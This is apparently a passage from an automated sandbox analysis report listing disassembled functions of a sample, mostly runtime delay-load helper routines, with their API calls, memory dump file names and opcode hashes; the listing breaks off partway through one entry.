        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 947cd73a1cad2594d50075dad2bf1cc9fe65dae20d9b5ec43932cbca14d4dd74
        • Instruction ID: eaa1726d5a2403079df0a6a492da40a53af778bc541ca3282ffffb772492657e
        • Opcode Fuzzy Hash: 947cd73a1cad2594d50075dad2bf1cc9fe65dae20d9b5ec43932cbca14d4dd74
        • Instruction Fuzzy Hash: 44B01291668500FCF30831503D0AF36020CC5D0B1AF30863FF402D40809B400D4E22B1
        Function 0013A235 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • DestroyWindow.USER32(?,00000000,0013E640,?,?,00000001,?,?,0013C999,001560F0,00181CF0,00181CF0,00001000,?,00000000,?), ref: 0013A241
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: DestroyWindow
        • String ID:
        • API String ID: 3375834691-0
        • Opcode ID: 6b3be8a4b9d61a3170d3c6efc7405e432c35e01747017d9446666a4a1b077e73
        • Instruction ID: c96d9efd2b71a5e61e99f13ed7affca7e4cd60e8dd179438ef9975e43401c2bf
        • Opcode Fuzzy Hash: 6b3be8a4b9d61a3170d3c6efc7405e432c35e01747017d9446666a4a1b077e73
        • Instruction Fuzzy Hash: B1C04C31011B208BD7355B14EA0D79277E5AF04B16F05C85DA0965686087B5A894CB44
        Function 0013F363 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 6d7e5d465f72d76e8bba3461c44716e0c22e49b05712ccef27ebe94e4ccd2b26
        • Instruction ID: 6b2ee505123b019203fc1e26972e535f2054c5632e65826e26324f50ab2165df
        • Opcode Fuzzy Hash: 6d7e5d465f72d76e8bba3461c44716e0c22e49b05712ccef27ebe94e4ccd2b26
        • Instruction Fuzzy Hash: DFA00295569102BCF55861517D16D36021CD4D4B55771452EF412C448596401946A571
        Function 0013F3A9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 3c846debb4150f6da7d97e4f64fe43246002c9a74d5ff3cca1bffebbb4938bd3
        • Instruction ID: 6b2ee505123b019203fc1e26972e535f2054c5632e65826e26324f50ab2165df
        • Opcode Fuzzy Hash: 3c846debb4150f6da7d97e4f64fe43246002c9a74d5ff3cca1bffebbb4938bd3
        • Instruction Fuzzy Hash: DFA00295569102BCF55861517D16D36021CD4D4B55771452EF412C448596401946A571
        Function 0013F3C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F32D
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 0d1836c08117d54ffa727193eb0c87bd9f37a364695593bbf10df0b015ffa23b
        • Instruction ID: 6b2ee505123b019203fc1e26972e535f2054c5632e65826e26324f50ab2165df
        • Opcode Fuzzy Hash: 0d1836c08117d54ffa727193eb0c87bd9f37a364695593bbf10df0b015ffa23b
        • Instruction Fuzzy Hash: DFA00295569102BCF55861517D16D36021CD4D4B55771452EF412C448596401946A571
        Function 0013F539 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: fd6b2bb091518109d18c9c14ece474653252ad5ef397b6b0e8d414305614e2ee
        • Instruction ID: e0b9b72a16f26a49ce2a1fba60a52dd9470069afb7b1461c1996915c73ebefc4
        • Opcode Fuzzy Hash: fd6b2bb091518109d18c9c14ece474653252ad5ef397b6b0e8d414305614e2ee
        • Instruction Fuzzy Hash: 22A011C2AE8000BEF2082A203E02E3A020CC0E0B22B32802FF822C8080AB80080B2230
        Function 0013F554 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 80f79219d550d2556d8ac522f0b18299eff56b709a66a6e606a69b0ef00da118
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 80f79219d550d2556d8ac522f0b18299eff56b709a66a6e606a69b0ef00da118
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        Function 0013F55E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8aa70c4be8ead8bde49639ffd8b0cc0a3fa93617aa2d3cf1dc5f21a62b7c0fc7
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 8aa70c4be8ead8bde49639ffd8b0cc0a3fa93617aa2d3cf1dc5f21a62b7c0fc7
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        Function 0013F57C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 42a2dc8d35baa026d8fb8ae02b86ebe42c5038f9854d3bc470251e3bb84c378e
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 42a2dc8d35baa026d8fb8ae02b86ebe42c5038f9854d3bc470251e3bb84c378e
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        Function 0013F590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 3df54c2de1fe6c75f1b7d87891227e8bd598a0f6a0574bd9287ba6056ef9cce4
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 3df54c2de1fe6c75f1b7d87891227e8bd598a0f6a0574bd9287ba6056ef9cce4
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        Function 0013F586 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F546
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 6d907ace73af6d478d5fe0f07f73cc6a2f55ded94fdebe1acb2c99091174d14f
        • Instruction ID: fec5bdec1dd9831425c9c2672d42f52f10191c5d9f3916543852b072312fbc9b
        • Opcode Fuzzy Hash: 6d907ace73af6d478d5fe0f07f73cc6a2f55ded94fdebe1acb2c99091174d14f
        • Instruction Fuzzy Hash: 16A012C15E8001BDF10821103C02E36010CC0D4B51B31442FF402C40805740080B1130
        Function 0013F6BD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 8f033f8b5f06cc0c4aad092a232d2aca9d44ff1ab1420b3b4ed407e4162296cc
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 8f033f8b5f06cc0c4aad092a232d2aca9d44ff1ab1420b3b4ed407e4162296cc
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        Function 0013F6D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: f610a86becb49c1cf745fa79e517c8d3e616023c7468a0d41326e80ee64c2aa8
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: f610a86becb49c1cf745fa79e517c8d3e616023c7468a0d41326e80ee64c2aa8
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        Function 0013F6DB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 9eb488e273f6384440f866aa9fcb369ef68bd84c76191b45cff68cc55b00ae5e
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 9eb488e273f6384440f866aa9fcb369ef68bd84c76191b45cff68cc55b00ae5e
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        Function 0013F6C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
        • String ID:
        • API String ID: 1269201914-0
        • Opcode ID: 7a8f4ce62a7fb6e139ca40be20809eda5bda95df6f3a571b96e4373c2dbf5d1e
        • Instruction ID: b5581386643e8e893a11a1e4206e42cd936ddc352d080cb9b927944ce6c35301
        • Opcode Fuzzy Hash: 7a8f4ce62a7fb6e139ca40be20809eda5bda95df6f3a571b96e4373c2dbf5d1e
        • Instruction Fuzzy Hash: 68A001D6AB9102BCF21872617D17E7B021CC4E8B6AB31893EF812D84D1AA80184A2671
        Function 0013F6E5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
        Download Yara Rule
        APIs
        • ___delayLoadHelper2@8.DELAYIMP ref: 0013F69B
          • Part of subcall function 0013F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0013FA4C
          • Part of subcall function 0013F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0013FA5D
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
